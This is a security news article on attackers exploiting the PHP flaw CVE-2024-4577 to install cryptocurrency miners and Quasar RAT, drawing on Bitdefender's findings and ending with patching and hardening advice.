Malicious actors are leveraging a severe vulnerability in PHP to distribute cryptocurrency miners and remote access trojans, including Quasar RAT.
The vulnerability, identified as CVE-2024-4577, is an argument injection flaw in PHP that affects Windows-based systems operating in CGI mode, allowing remote attackers to execute arbitrary code.
According to Bitdefender, a cybersecurity firm, there has been a significant increase in exploitation attempts targeting CVE-2024-4577 since late last year, with the majority of attacks originating from Taiwan (54.65%), Hong Kong (27.06%), Brazil (16.39%), Japan (1.57%), and India (0.33%).
Approximately 15% of the detected exploitation attempts involve basic vulnerability checks using commands like “whoami” and “echo
Bitdefender’s Technical Solutions Director, Martin Zugec, noted that around 5% of the detected attacks resulted in the deployment of the XMRig cryptocurrency miner.
“Additionally, a smaller campaign involved the deployment of Nicehash miners, which is a platform that allows users to sell computing power for cryptocurrency,” Zugec added. “The miner process was disguised as a legitimate application, such as javawindows.exe, to evade detection.”
Other attacks have been found to exploit the vulnerability to deliver remote access tools like the open-source Quasar RAT, as well as execute malicious Windows installer (MSI) files hosted on remote servers using cmd.exe.
In a surprising turn of events, Bitdefender also observed attempts to modify firewall configurations on vulnerable servers to block access to known malicious IPs associated with the exploit.
This unusual behavior has raised the possibility that rival cryptojacking groups are competing for control over susceptible resources and preventing them from being targeted again. This is consistent with historical observations about how cryptojacking attacks often terminate rival miner processes before deploying their own payloads.
This development comes shortly after Cisco Talos revealed details of a campaign exploiting the PHP flaw in attacks targeting Japanese organizations since the start of the year.
Users are advised to update their PHP installations to the latest version to protect against potential threats.
“Since most campaigns have been using living-off-the-land (LOTL) tools, organizations should consider limiting the use of tools such as PowerShell within the environment to only privileged users, such as administrators,” Zugec said.
